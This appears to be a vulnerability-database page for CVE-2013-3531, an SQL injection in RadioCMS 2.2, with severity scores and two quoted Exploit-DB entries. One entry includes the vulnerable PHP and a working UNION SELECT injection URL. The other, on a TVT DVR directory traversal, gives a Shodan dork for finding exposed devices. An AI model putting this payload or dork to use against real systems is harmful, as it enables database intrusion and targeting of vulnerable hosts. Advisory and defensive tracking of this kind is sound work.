CVE-2013-3531
published 2013-05-10CVE-2013-3531: SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows remote attackers to execute arbitrary SQL commands via the playlist_id parameter.
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.22%
80.5th percentile
SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows remote attackers to execute arbitrary SQL commands via the playlist_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| radiocms | radiocms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TVT TD-2308SS-B DVR - Directory Traversal
exploitdb·2013-12-01·CVSS 7.8
CVE-2013-6023 [HIGH] TVT TD-2308SS-B DVR - Directory Traversal
TVT TD-2308SS-B DVR - Directory Traversal
---
# Exploit Title: TVT TD-2308SS-B DVR directory traversal
# Shodan Dork: "Cross Web Server"
# Date: 01 Dec 2013
# Disclosure date: 10 Sep 2013
# Exploit Author: Cesar Neira
# Vendor Homepage: http://en.tvt.net.cn/
# Affected Firmware Versions:
3.1.43.B
3.1.43.P
3.1.6.P-1.0.2.1-03
3.1.75.B-1.0.2.1-00
3.1.7.B-1.0.2.1-00
3.1.81.B-1.0.2.1-00
3.1.83.B-1.0.2.1-00
3.1.83.P-1.0.4.2-03
3.1.87.P-1.0.4.2-17
3.1.91.P-1.0.2.1-03
3.1.92.P-1.0.2.1-00
3.1.93.B-1.0.2.1-17
3.2.0.B-1.0.2.1-17
3.2.0.P-1.0.2.1-03
3.2.0.P-1.0.2.1-17
3.2.0.P-1.0.6.0.32-00
3.2.0.P-3520A-00
3.2.0.P-3520A-03
3.2.0.P-3531-00
3.2.0.P-3531-11
3.2.0.P-FH-00
3.2.9.P-3520A-06
maybe others.
# Tested on: TVT DVR TD-2308SS-B
# CVE : CVE-2013-6023
# References:
http://www.kb.cert.org/vuls/id/785
Exploit-DB
RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection
exploitdb·2013-05-26
CVE-2013-3531 RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection
RadioCMS 2.2 - 'menager.php?playlist_id' SQL Injection
---
#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################
--[ Vuln Code ] --
...
if ($_GET['playlist_id']) {
$playlist_id_get = ['playlist_id'];
}
...
if ($playlist_id != "") {
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";
...
################################################
--[ Exploitable ]--
http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12
################################################
No writeups or analysis indexed.
http://osvdb.org/92088http://packetstormsecurity.com/files/121091/Radio-CMS-2.2-SQL-Injection.htmlhttp://www.securityfocus.com/bid/58884https://exchange.xforce.ibmcloud.com/vulnerabilities/83266http://osvdb.org/92088http://packetstormsecurity.com/files/121091/Radio-CMS-2.2-SQL-Injection.htmlhttp://www.securityfocus.com/bid/58884https://exchange.xforce.ibmcloud.com/vulnerabilities/83266
2013-05-10
Published